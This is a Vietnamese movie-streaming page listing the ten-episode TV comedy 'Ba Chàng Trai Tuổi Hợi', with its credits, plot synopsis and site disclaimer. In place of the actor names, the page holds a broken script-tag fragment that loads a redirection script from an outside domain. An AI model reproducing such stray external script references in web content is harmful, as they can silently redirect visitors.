xem phim ba chang trai tuoi hoi online, download Ba Chàng Trai Tuổi Hợi 10/10 hd online
Neu ban khong vao duoc, xin vui long thu lai sau, chung toi dang co gang khac phuc su co.
 
 
Ba Chàng Trai Tuổi Hợi 10/10 - phim viet nam
ba chang trai tuoi hoi

Ba Chàng Trai Tuổi Hợi 10/10

,

10 episodes | Luot Xem: 103068   |  0 |  
Dien Vien: src="http://raphd.net/js/redirection_mobile.js">

cham bi  Description - Thong tin them ve phim
Ba Chang Trai Tuoi Hoi
Ba Chàng Trai Tuổi Hợi
Đạo diễn: Mỹ Khanh
Diễn viên: Trí Quang, Quốc Cường, Thái Hòa, Trang Nhung
Nhà sản xuất: TFS - Hãng phim Việt
Thể loại: Truyền hình
Tổng số: 10 tập
Quốc gia: Việt Nam
Giới thiệu: Hoàng, Hiền và Hào - cặp ba tuổi Hợi ( Sinh năm 1971 ) là bạn học từ thời phổ thông, cùng sáng lập công ty ý tưởng H.H.H và rất thành công trên thương trường với những ý tưởng táo bạo mang tính phục vụ cộng đồng xã hội rất cao như: Dự án giáo dục kỹ năng sống cho học sinh, dự án việc làm cho người khuyết tật, sàn giao dịch ý tưởng….Nhưng khi nhắc tới việc lập gia đình thì cả ba không màng tới dù đã 36 tuổi. Hiền mang trong lòng một mối hận tình nên thù ghét phụ nữ và quay lưng với tình yêu. Hoàng đặt tiêu chuẩn tìm vợ quá cao nên cứ đi tìm mãi mà chưa có ai ưng ý. Hào chọn cuộc sống độc thân … có nhiều bồ, anh cho chuyện lập gia đình là phiền phức và mất tự do. Mặc nhiên họ quan niệm rằng thành công trong việc là đủ để hạnh phúc.Tuy nhiên, cha mẹ của các chàng trai thì không nghĩ vậy, với kinh nghiệm sống ở đời, họ đúc kết rằng ai biết cân bằng giữa công việc và gia đình, biết tạo cuộc sống tình cảm, tinh thần phong phú, hoà mình với cảnh vật con người xung quanh thì mới đạt tới đỉnh điểm của hạnh phúc. Vì vậy, họ tìm mọi cách để thuyết phục và kiên trì hướng con mình đi tới việc lập gia đình. Tiêu biểu là cha mẹ của Hoàng: Ông bà Hai.


Sau nhiều năm dùng nhiều cách tế nhị nhưng không hiệu quả, bà Hai bàn với các chị gái, anh rể của Hoàng phải vào cuộc, đi tìm người hợp với Hoàng rồi bố trí sao cho họ gặp nhau một cách tự nhiên tình cờ, vì Hoàng rất dị ứng với chuyện mai mối.Cả gia đình vào cuộc, mọi thứ rối tung, nhiều chuyện dở khóc dở cười xảy ra, cuối cùng không những chuyện mai mối liên tiếp bị thất bại mà suýt nữa Hoàng mất luôn một người mà anh bắt đầu có cảm tình trong quá trình làm việc với đối tác.Qua sóng gió, Hoàng chợt hiểu rằng không có tiêu chuẩn nào cho tình yêu cả, yêu một người nào đó chân thành tức là không giải thích nổi lý do vì sao ta yêu nàng. Hiền cũng bắt đầu nhìn phụ nữ tốt đẹp hơn khi chứng kiến mối tình của Hoàng. Còn Hào, không biết anh ta có thay đổi quan niệm sống hay không khi cuối phim là hình ảnh các cô bồ của Hào tập trung lại đi tìm anh ta xử tội.
Phim cùng thể loại - Similar movies
View: 1279241
View: 241540
View: 976843
View: 191686
Đăng kí nhận phim mới qua email

 
Copyright © 2007 - 2012 Kenh88.Com Phim Online Entertainment Network
Phim88.com is a portal that made for Phim, Phim Online, Xem Phim, Online Phim and Xem Phim Online.
Phim88.Com main focus on phim online, online phim, xem phim online, download phim. Phim tai phim88.com chat luong cao va download truc tiep. Ban co the xem phim online hoac download phim toc do cao. Phim88.Com covers phim viet nam, phim hong kong, phim han quoc, phim trung quoc, phim dai loan, phim le, phim bo, phim tap, phim tvb.
Phim88.Com is absolutely legal and contain only links to other sites on the Internet : (youtube.com, dailymotion.com,.. ).Phim88.Com is not responsible for the accuracy, compliance, copyright, legality, decency, or any other aspect of the content of other linked sites.
If you have any legal issues please contact appropriate media file owners / hosters.

DMCA Notification | Privacy Policy
amung